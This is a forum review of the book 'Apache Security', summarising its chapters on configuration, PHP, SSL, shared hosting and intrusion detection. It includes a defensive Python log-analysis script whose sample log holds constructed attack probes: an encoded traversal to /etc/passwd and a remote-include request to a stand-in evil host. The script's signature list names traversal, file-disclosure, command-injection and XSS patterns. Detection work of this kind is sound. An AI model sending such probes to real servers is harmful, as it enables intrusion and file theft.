Trusted SF Member
Joined: 26 Aug 2003
Location: Warwickshire, England, UK
Posted: Sat Aug 27, 2005 4:53 pm    Post subject: Book Review - Apache Security
Author(s): Ivan Ristic
Publisher: O'Reilly http://www.oreilly.com
Date Published: March 2005
Book Specifications: Softcover, 396 pages
Category: Web / Security
Publisher's Suggested User Level: None
Reviewer's Recommended User Level: Server Administrator / Web Programmer
Suggested Publisher Price: $34.95 US / $48.95 CAN
Info from back cover:
The Apache web server dominates the market, and its popularity continues to grow. While there is a lot of documentation for installing, configuring, and maintaining Apache, there is far less on the complex subject of securing it. Apache Security is the comprehensive book you've been looking for.
Apache Security is an invaluable source of information, whether you're a system administrator responsible for the security of the sites you administer, a programmer who wants to create secure applications, a system architect who needs to understand how system design decisions affect security, or a web security professional.
Apache Security covers the full range of web security topics, with descriptions of those specific to Apache, as well as guidance and references for related topics. You'll find detailed recommendations for all aspects of securing both the 1.3 and 2.0 versions of Apache.
Apache is the most widely used web server on the Internet, serving a huge majority of sites, many of which are in high demand, or offering critical services. The security of such servers is paramount to the success of the organisations running them, and with new vulnerabilities and attacks being discovered every day, the task of securing a web server is complex and time consuming.
This book guides the reader through the many aspects of Apache security, recommending solutions and detailing the issues surrounding them.
Chapter Synopsis & Review Comments
The book opens with a look at the principles of Apache security. It includes an explanation of threat modelling and details some of the various ways in which a system can be viewed, notably the user view and the network view. This chapter serves to introduce the concepts used throughout the book.
In chapter 2, the author walks through the installation and configuration of Apache. The chapter takes a critical approach to installation and configuration, focussing on security throughout, and recommending points during the install or configuration procedure at which security can be enhanced. A discussion of chrooting Apache is also included.
PHP is the topic of chapter 3. As the most popular web scripting language, PHP and Apache are often deployed together, and this chapter explains where PHP's security faults lie, and how best to configure your system to prevent these being exploited.
Chapter 4 discusses SSL (Secure Sockets Layer) and TLS (Transport Layer Security), the protocols that wrap HTTP to provide encrypted (HTTPS) communication. As is typical for books which discuss encryption in the real world, the chapter opens with an overview of the cryptography behind SSL and TLS. OpenSSL is covered in this chapter, and a discussion of Apache's mod_ssl ends the chapter.
Chapter 5 marks the point at which the book deviates from "install and configure" to looking at the threats faced by an in-production Apache server, and the ways in which they can be prevented. Of course, many of the solutions require changes to the configuration (or the installation itself), so the book does not completely lose the configuration topic at this point. In chapter 5, Denial of Service attacks are explained, along with a section on the infamous Slashdot Effect, the huge traffic spike caused when an article on an external server is linked from the main Slashdot page. The chapter also looks at some Apache-specific problems.
In chapter 6, the delicate topic of shared hosting is brought to the surface. The problems with sharing a single Apache server between many customers are numerous, and often result in the potential for users to access each other's files. Chapter 6 explains how such eventualities arise, and what a server administrator can do to prevent them. Per-user chrooting is covered in this chapter, as are execution wrappers (such as suEXEC) and FastCGI.
Chapter 7 looks at access control, authentication and Single Sign-On, while Chapter 8 discusses the ever-important topics of logging and monitoring, log manipulation, remote logging and analysis, integrity and event monitoring, and server status monitoring.
Chapter 9 brings up the topic of infrastructure: isolating applications, securing hosts and networks, the use of a reverse proxy (a role Apache itself can be configured to fill) and network design.
Chapter 10 discusses Web Application Security. This chapter looks at session management, attacks on clients, application logic flaws, information disclosure, file disclosure, SQL injection, XSS (Cross-Site Scripting), command execution, buffer overflows, and IDS (Intrusion Detection System) evasion techniques.
Chapter 11 handles the topic of security assessment: testing an environment for security. Chapter 12 discusses web intrusion detection, and looks at the Apache mod_security module.
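The log analysis of chapter 8 and the denial-of-service and attack-signature material of chapters 5, 10 and 12 meet in practice when an administrator sits down with the access log. As an added illustration (this is not code from the book, nor from the review), the Python script below parses Apache's "combined" log format and flags two things: a single client flooding the server with requests, and requests whose decoded path matches a small set of web-application attack patterns. The log lines it reads are constructed for the example, and the signature list is deliberately tiny; a real ruleset such as mod_security's is far larger.

```python
"""Parse Apache combined-format access logs and flag request floods and a
few web-application attack signatures.  Added example, not code from the
book; the log lines below are constructed for illustration."""
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Illustrative signatures, applied to the URL-decoded request path.
SIGNATURES = [
    ("path-traversal", re.compile(r"\.\./")),
    ("file-disclosure", re.compile(r"/etc/(passwd|shadow)\b")),
    ("remote-include", re.compile(r"=(https?|ftp)://", re.I)),
    ("command-injection", re.compile(r"[;|`]|%0a", re.I)),
    ("xss", re.compile(r"<script\b", re.I)),
]

# Constructed sample log: two normal requests, two attack probes, one junk
# line, then 30 requests from one client inside six seconds (the flood case).
SAMPLE_LOG = "\n".join(
    [
        '10.0.0.5 - - [27/Aug/2005:16:53:01 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
        '10.0.0.5 - - [27/Aug/2005:16:53:02 +0100] "GET /images/logo.png HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/4.0"',
        '192.0.2.7 - - [27/Aug/2005:16:53:02 +0100] "GET /cgi-bin/view.pl?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0" 404 291 "-" "curl/7.13.1"',
        '192.0.2.7 - - [27/Aug/2005:16:53:03 +0100] "GET /index.php?page=http://evil.example/cmd.txt HTTP/1.0" 200 876 "-" "curl/7.13.1"',
        "not a log line at all",
    ]
    + [
        '198.51.100.9 - - [27/Aug/2005:16:53:%02d +0100] "GET /big.iso HTTP/1.0" 200 - "-" "-"'
        % (5 + i // 5)
        for i in range(30)
    ]
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def parse_log(text):
    """Parse every line of a log, silently skipping lines that do not match."""
    return [e for e in (parse_line(line) for line in text.splitlines()) if e]


def find_suspicious(entries):
    """Return (ip, raw path, [matching rule names]) for each flagged request.
    The path is URL-decoded first so encoded traversal sequences are caught."""
    hits = []
    for e in entries:
        decoded = unquote(e["path"])
        names = [name for name, rx in SIGNATURES if rx.search(decoded)]
        if names:
            hits.append((e["ip"], e["path"], names))
    return hits


def find_bursts(entries, threshold, window_seconds):
    """Return the set of client IPs that made at least `threshold` requests
    within any `window_seconds` interval: a crude flood indicator."""
    windows = defaultdict(deque)
    flagged = set()
    for e in sorted(entries, key=lambda x: x["ts"]):
        q = windows[e["ip"]]
        q.append(e["ts"])
        while (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged.add(e["ip"])
    return flagged


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ip, path, rules in find_suspicious(entries):
        print("suspicious request from %s: %s  [%s]" % (ip, path, ", ".join(rules)))
    for ip in sorted(find_bursts(entries, threshold=20, window_seconds=10)):
        print("possible flood from %s" % ip)
```

The decode-before-match step matters: the traversal probe in the sample is sent with %2F-encoded slashes, and a signature applied to the raw path would miss it, which is exactly the kind of IDS evasion chapter 10 describes. The burst detector is a sliding window per client, so it reacts to rate rather than total volume; the threshold and window are site-specific knobs, not values the book prescribes.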
Style and Detail
The author of this book wrote the mod_security Apache module, and is clearly suited to the task of writing a book on Apache security. The content of the book is clear and precise, giving a balanced discussion of the problems faced by Apache server administrators, and the solutions they can employ, where any exist.
There is something in this book for everyone running an Apache server, regardless of the environment in which they run it. Users running a small web server from home will benefit from the first chapters, detailing how to install Apache in a more secure configuration, whilst professional hosting managers will benefit from the discussions of shared hosting techniques later in the book.
This is the sort of book that can be read in a variety of ways; the reader could pick it up and read it cover-to-cover, gaining a wealth of knowledge, and coming back to specific sections for reference as and when needed, or the book could be read in individual chapters, one at a time, in pretty much any order. The chapters are self-contained, but the effect of the book as a whole is to bring these individual topics together in such a way as to highlight the best approaches to securing the Apache web server.
The readability and accuracy of the content in this book, together with the relaxed writing style and self-contained chapters make this book ideal for anyone wishing to learn more about Apache security. It can be read first in a "tutorial" style, and later used as a reference manual for individual aspects of Apache security.
The only fault with this book is that, in cases where more than one solution to a security problem exists, the author has often chosen the one or two he thinks best. Whilst this is good in that it recommends those as the better solutions, they do not fit every situation, and a brief discussion of some of the alternatives (they are often mentioned by name, but little else is given) would have rounded this book off and given it a 10 on the SFDC review scale. Currently, this book scores a well-deserved 9, and would be a 9.5 if half-marks were available!
This book receives an honoured SFDC Rating of 9/10.
Keywords: Apache, security, chroot, mod_ssl, mod_security, logging, shared hosting, php, denial of service, ssl, tls, access control, http, httpd
This review is copyright 2005 by the author, Andrew J. Bennieston, and Security-Forums Dot Com, and may not be reproduced in any form in any media without the express permission of the author, or Security-Forums Dot Com.